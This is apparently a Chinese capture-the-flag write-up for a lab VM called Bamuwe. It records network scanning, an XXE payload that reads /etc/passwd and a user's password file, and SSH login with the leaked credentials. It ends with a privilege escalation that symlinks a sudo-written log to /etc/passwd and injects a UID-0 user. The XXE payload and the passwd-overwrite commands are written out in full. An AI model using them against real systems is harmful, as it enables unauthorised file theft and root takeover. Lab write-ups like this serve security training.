main arp-scan -l
1 2 3 4 5 6 Interface: eth0, type: EN10MB, MAC: 08:00:27:82:4b:5b, IPv4: 192.168.43.160 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.43.1 12:dd:b5:07:19:10 (Unknown: locally administered) 192.168.43.73 2c:9c:58:8e:96:a5 (Unknown) 192.168.43.74 08:00:27:cf:d8:16 PCS Systemtechnik GmbH 192.168.43.135 08:00:27:dc:f8:76 PCS Systemtechnik GmbH
nmap
1 2 3 4 5 6 7 8 9 10 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA) | 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA) |_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519) 80/tcp open http Apache httpd 2.4.62 ((Debian)) |_http-server-header: Apache/2.4.62 (Debian) |_http-title: Library Membership Registration MAC Address: 08:00:27:DC:F8:76 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
访问 wenb
源码提示
1 2 3 4 5 6 7 8 9 <!-- XML STRUCTURE EXAMPLE --> <!-- <user> <name>John Doe</name> <tel>123-4567890</tel> <email>admin@admin.com</email> <password>secret123</password> </user> -->
XXE打一下文件读取
exp
1 2 3 4 5 6 7 8 9 10 11 <!DOCTYPE ANY [ <!ENTITY fuck SYSTEM "file:///etc/passwd"> ]> <user> <name>John Doe</name> <tel>123-4567890</tel> <email> &fuck;</email> <password>secret123</password> </user>
1 2 welcome:x:1000:1000:,,,:/home/welcome:/bin/bash mosquitto:x:106:113::/var/lib/mosquitto:/usr/sbin/nologin
expect://id 执行不了命令
盲猜一般 user.txt 和 pass.txt
可以读出
/home/welcome/pass.txt
flag{user-9e681bd76c8db380aa2797b8becf6ba3}
==》
welcome:bd7787d41a6b28e9976873cf6a8445fe
ssh 连接
sudo -l
查看到可以无密码执行 /opt/sub.sh
1 2 3 4 5 6 welcome@Bamuwe:/var/lib/mosquitto$ sudo -l Matching Defaults entries for welcome on Bamuwe: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User welcome may run the following commands on Bamuwe: (ALL) NOPASSWD: /opt/sub.sh
1 2 welcome@Bamuwe:/var/lib/mosquitto$ ls -la /opt/sub.sh -rwxr-xr-x 1 root root 52 Apr 28 10:50 /opt/sub.sh
sudo /opt/sub.sh 后提示查看 mosquitto 的帮助信息
上网查询关于 mosquitto 的信息
Mosquitto 是一个开源的 MQTT 代理服务器 (MQTT Broker),实现了 MQTT 协议 (轻量级物联网消息协议)。它由 Eclipse 开发,适用于低带宽、高延迟的物联网(IoT)环境
主要用法如下
1 2 3 mosquitto_sub -h localhost -v -t "test" 订阅消息 mosquitto_pub -h localhost -t "test" -m 'hello world' 发布消息
可以查看 /opt/sub.sh 内容
1 /usr/bin/mosquitto_sub "$@" > /home/welcome/sub.log
即调用 sub 的订阅功能,并把接受到的结果输出到 sub.log
本来想进行命令执行,然后获取shell或者敏感信息,但行不通
1 2 3 sudo /opt/sub.sh -h localhost -t "test" -v mosquitto_pub -h localhost -t "test" -m "$(cat /etc/shadow)" cat /home/welcome/sub.log
因为 sudo 权限在订阅端,无法在 pub 端进行 sudo 执行
但注意到 > /home/welcome/sub.log 这个写入过程,并且其中 sub.log 用户可控
那么可能就可以创建软链接指向 /etc/passwd,添加新高权限用户
先准备一个写好的 /etc/passwd 的备份文件,结尾添加了一个用户
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 welcome@Bamuwe:~$ cat bake.txt root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin welcome:x:1000:1000:,,,:/home/welcome:/bin/bash mosquitto:x:106:113::/var/lib/mosquitto:/usr/sbin/nologin test:adMpHktIn0tR2:0:0:User_like_root:/root:/bin/bash
然后进行写入
1 2 3 4 5 rm sub.log ln -s /etc/passwd sub.loh sudo /opt/sub.sh -h localhost -t "test" -v mosquitto_pub -h localhost -t "test" -m "$(cat passwd.bak)" cat /etc/passwd
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin welcome:x:1000:1000:,,,:/home/welcome:/bin/bash mosquitto:x:106:113::/var/lib/mosquitto:/usr/sbin/nologin test:adMpHktIn0tR2:0:0:User_like_root:/root:/bin/bash
BlingBling,成功写入用户
1 2 su -u test password:test
提权成功
1 2 3 4 5 6 7 welcome@Bamuwe:~$ su test Password: test root@Bamuwe:/home/welcome# cd /root test root@Bamuwe:~# ls root.txt test root@Bamuwe:~# cat root.txt flag{root-78a594db4a7c7d05f6366740501ad4c6}
后记 可能搞安全不仅仅需要知识的原始积累,更重要的是快速的学习能力和分析思维。后面会遇到更多没有见过的东西和抽象的东西,只要把思维格局打开,才能适应未来快速变化的环境。
这个可以当作兴趣。
